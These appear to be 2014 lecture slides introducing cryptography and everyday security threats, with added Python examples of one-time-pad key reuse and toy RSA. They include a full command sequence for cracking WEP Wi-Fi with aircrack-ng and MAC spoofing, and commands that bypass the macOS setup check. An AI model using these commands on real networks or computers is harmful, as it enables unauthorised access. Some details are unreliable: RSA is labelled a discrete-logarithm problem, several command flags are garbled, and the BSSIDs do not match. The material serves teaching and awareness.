ISC 10 October 2014 George Wong
Sn vs Al
Tin was first replaced by aluminum starting in 1910. In the late 19th century and early 20th century, tin foil was in common use, and some people continue to refer to the new product by the name of the old one. Tin foil tends to give a slight tin taste, which is a major reason it has largely been replaced by aluminum and other materials.

Difference?
Aluminum: The shielding effectiveness of aluminum foil depends upon the type of incident field and the frequency. For f > 100 MHz, E_atten > 80 dB. Aluminum foil is very effective at attenuating low-frequency magnetic fields. A thickness of ~10 sheets offers less than 1 dB of shielding at 1 kHz, ~8 dB at 10 kHz, ~25 dB at 100 kHz.

Don't Trust Anyone! or You have to trust someone.

PERFECT SECURITY
What does it mean?
What does that mean?
Can we achieve it?

YES: One-Time Pad (OTP)
Bit-wise XOR with randomly generated key.
Key must be same length as message
Key cannot be reused
Not practical!

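The one-time pad rules above, as an added example that is not part of the original slides: it implements the bit-wise XOR scheme and shows what breaks when the "key cannot be reused" rule is ignored. The function names and the two sample messages are constructed for illustration.

```python
# Added example (not from the slides): one-time pad and the cost of key reuse.
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bit-wise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("OTP requires key and message of the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def otp_keygen(length: int) -> bytes:
    """Fresh random key from the OS CSPRNG, exactly as long as the message."""
    return secrets.token_bytes(length)


def otp_encrypt(key: bytes, message: bytes) -> bytes:
    return xor_bytes(key, message)


def otp_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    # XOR is its own inverse, so decryption is the same operation.
    return xor_bytes(key, ciphertext)


def reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """If one key encrypted both messages, c1 XOR c2 == p1 XOR p2 (key cancels)."""
    return xor_bytes(c1, c2)


def recover_second_message(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Knowing one plaintext then yields the other without ever seeing the key."""
    return xor_bytes(reuse_leak(c1, c2), known_p1)


if __name__ == "__main__":
    p1 = b"MEET AT NOON"   # constructed sample message
    p2 = b"SEND 50 USD!"   # constructed sample message, same length
    key = otp_keygen(len(p1))
    c1, c2 = otp_encrypt(key, p1), otp_encrypt(key, p2)  # key reused: the mistake
    print(otp_decrypt(key, c1))
    print(recover_second_message(c1, c2, p1))
```
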
Computational Security
Function of security parameter (key length)
Security increases with time.
In practice:
No need to exchange keys
Computationally easy to perform
Computationally hard to break

Basics of Asymmetric Cryptography
YOU: Create PRIV-PUB key pair, publish PUB key
External Party: Get PUB key
External Party: Encrypt message with PUB and send ciphertext
YOU: Decrypt ciphertext with PRIV

Basis for Asymmetric Cryptography
One-way functions must exist: Easy to compute, hard (impossible?) to invert
Sample methodologies (Cyclic Groups)
Discrete Logarithm
Elliptic Curve

Cyclic Group
Set of elements with element(s) that generate(s) the others
Given an element, hard to find the exponent!

Discrete Logarithm (RSA)
Given n, e, and b, find a.
Breaking this requires:
Brute force
Factoring n, a (very) large number (NP)

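The key-pair flow from "Basics of Asymmetric Cryptography" and the "given n, e, and b, find a" problem, as an added example that is not part of the original slides. It assumes the textbook relation b = a^e mod n (the formula itself is not on the page) and uses deliberately tiny, constructed primes so that factoring n is instant, which is why real moduli must be very large.

```python
# Added example (not from the slides): textbook RSA with toy parameters.
# Assumption: b = a^e mod n. No padding; never use this for real data.
from math import gcd


def keygen(p: int, q: int, e: int = 17):
    """Return (public key (n, e), private exponent d) from two primes."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to (p-1)(q-1)")
    d = pow(e, -1, phi)          # modular inverse of e (Python 3.8+)
    return (n, e), d


def encrypt(pub, a: int) -> int:
    """External party: b = a^e mod n using only the published key."""
    n, e = pub
    if not 0 <= a < n:
        raise ValueError("message must be in [0, n)")
    return pow(a, e, n)


def decrypt(pub, d: int, b: int) -> int:
    """Key owner: a = b^d mod n using the private exponent."""
    n, _ = pub
    return pow(b, d, n)


def factor_by_trial_division(n: int):
    """Feasible only because n is tiny; cost grows with the size of n."""
    if n % 2 == 0:
        return 2, n // 2
    f = 3
    while f * f <= n:
        if n % f == 0:
            return f, n // f
        f += 2
    raise ValueError("n has no non-trivial factor")


def recover_private_exponent(pub) -> int:
    """Factoring n gives (p-1)(q-1), and from that the private exponent."""
    n, e = pub
    p, q = factor_by_trial_division(n)
    return pow(e, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    pub, d = keygen(61, 53)      # constructed toy primes, n = 3233
    b = encrypt(pub, 65)
    print(pub, d, b, decrypt(pub, d, b), recover_private_exponent(pub))
```
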
Elliptic Curve

Hardcore Attack Strategy
Find security flaw
Spoof
Probe
Brute-force
Differential Cryptanalysis
Exploit (Escalate Privileges)
Drop Payload
Housekeeping

Worst Danger of Cryptography
Ceiling Tiles!

Random Numbers
Linear Congruence Generator
Mersenne Twister
Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG)
NSA

In Practice
Social Engineering
Asking / looking over the shoulder
Post-it notes
Piggybacking / Tailgating
Phishing
Keyloggers
Cracking (vs Hacking!)
Known Exploits (e.g. Heartbleed)
Metasploit
Kali Linux (i.e. BackTrack 6)

Certificate Authority (CA)
Phonebook, do you trust the distributor?
How do you get the public key?
VeriSign, Digi-Sign, et al.
Limits liability to $100

MITM
Man In The Middle
You have to send your data at some point
Ettercap, ARP Spoofing and Promiscuous mode
Alice, Bob, Eve

Cracked Files
If a computer can run a file, you can read it and you can modify it!
Assembly: list of instructions
Code injection
Validation has to happen somewhere, so rewrite the code to skip validation!

WEP (Wired Equivalent Privacy)
IV attack
$ airmon-ng stop wlan0
$ ifconfig wlan0 down
$ macchanger mac 00:11:22:33:44:55 wlan0
$ airmon-ng start wlan
$ airodump-ng wlan0
$ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0
$ aireplay-ng -1 0 a 00:16:B6:B4:66:46 h 00:11:22:33:44:55 e PeteNetLive wlan0
$ aireplay-ng -3 b 00:16:B6:B4:66:46 h 00:11:22:33:44:55 wlan0
$ aircrack-ng b 00:16:B6:B4:66:46 myfile-01.cap

WEP (Wired Equivalent Privacy)
$ airmon-ng stop wlan0
$ ifconfig wlan0 down
$ macchanger mac 00:11:22:33:44:55 wlan0
$ airmon-ng start wlan
$ airodump-ng wlan0
$ airodump-ng c 1 w myfile bssid 00:16:B6:C4:66:46 wlan0
$ aireplay-ng -1 0 a 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 e Karabraxos wlan0
$ aireplay-ng -3 b 01:3E:04:C1:E0:92 h 00:11:22:33:44:55 wlan0
$ aircrack-ng b 01:3E:04:C1:E0:92 myfile-01.cap

Windows
OphCrack, Cain & Abel, Kon-Boot

Single User mode
Notoriously easy to break into
Mac OSX
Tools: S Headphones
$ /sbin/mount wu /
$ rm /var/db/.applesetupdone

How to avoid the above:
Make yourself a bad target
Use encryption
Update your system
Don't publicize the worth of your information

The rules about keeping your information safe:
1. Your information is not safe.
2. Don't assume you can keep your information safe.
3. If someone tells you your information is safe, see Rule 1. It applies twice now.

THANK YOU!